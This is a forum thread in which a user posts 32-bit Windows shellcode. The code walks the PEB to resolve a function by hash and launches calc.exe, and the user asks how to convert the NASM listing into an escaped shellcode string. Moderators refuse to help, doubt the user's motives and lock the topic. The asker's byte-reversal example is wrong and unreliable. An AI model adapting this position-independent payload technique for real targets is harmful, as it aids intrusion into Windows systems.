Creating Shellcode from Assembly

[NeonFlash]

Let's say I have the assembly file as follows:

Code: [Select]

BITS 32

and dword [edi], 0xFFFFFFFE
pushad
push 0xdead1337

xor esi,esi
push esi
mov esi,[fs:esi+0x30]
mov esi,[esi+0xc]
mov esi,[esi+0x1c]
l1:
mov ebp,[esi+0x8]
mov esi,[esi]
mov ebx,[ebp+0x3c]
mov ebx,[ebp+ebx+0x78]
add ebx,ebp
mov ecx,[ebx+0x18]
jcxz l1
l2:
mov edi,[ebx+0x20]
add edi,ebp
mov edi,[edi+ecx*4-0x4]
add edi,ebp
xor eax,eax
cdq
l3:
xor dl,[edi]
ror dx,0x1
scasb
jnz l3
cmp dx,0xf510
loopne l2
jnz l1
mov edx,[ebx+0x24]
add edx,ebp
movzx edx,word [edx+ecx*2]
mov edi,[ebx+0x1c]
add edi,ebp
add ebp,[edi+edx*4]
push dword 0x6578652e
push dword 0x636c6163
push esp
xchg eax,[esp]
push eax
call ebp

l10:
    pop eax
    cmp eax, 0xdead1337
    jne l10

popad

xor eax,eax

ret

int3
I can run it through NASM to assemble it and it will show the hex opcodes for each instruction next to them as follows:

Code: [Select]

00000000  8327FE            and dword [edi],byte -0x2
00000003  60                pushad
00000004  683713ADDE        push dword 0xdead1337
00000009  31F6              xor esi,esi
0000000B  56                push esi
0000000C  648B7630          mov esi,[fs:esi+0x30]
00000010  8B760C            mov esi,[esi+0xc]
00000013  8B761C            mov esi,[esi+0x1c]
00000016  8B6E08            mov ebp,[esi+0x8]
00000019  8B36              mov esi,[esi]
0000001B  8B5D3C            mov ebx,[ebp+0x3c]
0000001E  8B5C1D78          mov ebx,[ebp+ebx+0x78]
00000022  01EB              add ebx,ebp
00000024  8B4B18            mov ecx,[ebx+0x18]
00000027  67E3EC            jcxz 0x16
0000002A  8B7B20            mov edi,[ebx+0x20]
0000002D  01EF              add edi,ebp
0000002F  8B7C8FFC          mov edi,[edi+ecx*4-0x4]
00000033  01EF              add edi,ebp
00000035  31C0              xor eax,eax
00000037  99                cdq
00000038  3217              xor dl,[edi]
0000003A  66D1CA            ror dx,1
0000003D  AE                scasb
0000003E  75F8              jnz 0x38
00000040  6681FA10F5        cmp dx,0xf510
00000045  E0E3              loopne 0x2a
00000047  75CD              jnz 0x16
00000049  8B5324            mov edx,[ebx+0x24]
0000004C  01EA              add edx,ebp
0000004E  0FB7144A          movzx edx,word [edx+ecx*2]
00000052  8B7B1C            mov edi,[ebx+0x1c]
00000055  01EF              add edi,ebp
00000057  032C97            add ebp,[edi+edx*4]
0000005A  682E657865        push dword 0x6578652e
0000005F  6863616C63        push dword 0x636c6163
00000064  54                push esp
00000065  870424            xchg eax,[esp]
00000068  50                push eax
00000069  FFD5              call ebp
0000006B  58                pop eax
0000006C  3D3713ADDE        cmp eax,0xdead1337
00000071  75F8              jnz 0x6b
00000073  61                popad
00000074  31C0              xor eax,eax
00000076  C3                ret
00000077  CC                int3
Now, what I want to do is, extract all the hex opcodes from above and format is as a shellcode like \x<hex bytes> format.

For instance the first two instructions:

00000000  8327FE            and dword [edi],byte -0x2
00000003  60                pushad

would be written as: \xFE\x27\83\x60 (in Little Endian Format).

I am doing this manually but is there a way to automate this?

Any help would be appreciated and please note that this is only for learning purpose.

Regards,
NeonFlash

[Frank Kotler]

I really question what you're trying to "learn" here. It should be quite trivial to convert Nasm's output to "\xFE" format. I doubt  if you want to "convert" it to little-endian format - Nasm's output is already little-endian. If you don't know how to do this, it makes me doubt that you wrote the proposed code. That would make you a "script kiddie", and I doubt if anyone here wants to help you. You could convince me that you're "legitimate" by explaining what your proposed code is intended to do. Otherwise, take it elsewhere.

Best,
Frank

[Rob Neff]

I am curious as to your understanding of the usage of undocumented Windows internal data structures in the code posted for your "learning" purposes and where you obtained that code from.  As Frank stated - if you aren't just another script kiddie - prove your understanding of the code and what legitimate purpose, if any, it serves.  Otherwise, this topic will soon become locked.

[Rob Neff]

I think a full week is more than sufficient to wait to hear a reply from the OP.  No reply = topic locked.